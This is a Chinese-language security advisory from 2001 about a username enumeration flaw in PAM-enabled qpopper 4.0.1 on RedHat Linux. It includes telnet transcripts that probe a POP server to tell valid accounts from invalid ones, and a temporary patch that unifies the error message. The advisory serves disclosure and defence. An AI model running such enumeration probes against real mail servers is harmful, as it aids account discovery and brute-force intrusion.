Red Hat PAM qpopper 列举用户名漏洞
发布日期:2001-08-31
更新日期:2001-08-31
受影响系统:Qualcomm qpopper 4.0.1
- RedHat Linux 7.1
- RedHat Linux 7.0
描述:
BUGTRAQ ID:3242
Qpopper是一款UNIX平台下广泛使用的POP守护程序。
发现运行在RedHat平台下的支持PAM的Qpopper存在列举有效用户名的漏洞,这是由于
PAM认证模块对有效的用户名和无效的用户名输出不同错误信息造成的。
这可能导致远程攻击者进行穷举攻击。
<*来源:Charles Chear (presto@tpgn[.]net)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Charles Chear (presto@tpgn[.]net)提供了如下测试代码:
对已存在的帐号:
[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22975.998689264@target.host>
user validuser
+OK Password required for validuser.
pass valid
-ERR [AUTH] PAM authentication failed for user "validuser": Authentication
failure (7)
+OK Pop server at target.host signing off.
Connection closed by foreign host.
对不存在的帐号:
[root@bart /etc]# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22984.998689464@target.host>
user fakeuser
+OK Password required for fakeuser.
pass fakeeeee
-ERR [AUTH] Password supplied for "fakeuser" is incorrect.
+OK Pop server at target.host signing off.
Connection closed by foreign host.
建议:
Ron Bradburn <
ron@dialtone.com>提供了下列临时补丁代码:
--- popper/pop_pass.c.orig Sat Aug 25 19:05:41 2001
+++ popper/pop_pass.c Sat Aug 25 19:06:58 2001
@@ -368,7 +368,7 @@
*/
static int gp_errcode = 0;
static char *GP_ERRSTRING =
- "[AUTH] PAM authentication failed for user \"%.100s\": %.128s (%d)";
+ "[AUTH] Password supplied for \"%.100s\" is incorrect.";
static int
PAM_qpopper_conv ( int num_msg,
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.eudora.com/freeware/qpop.html浏览次数:5457
严重程度:0(网友投票)
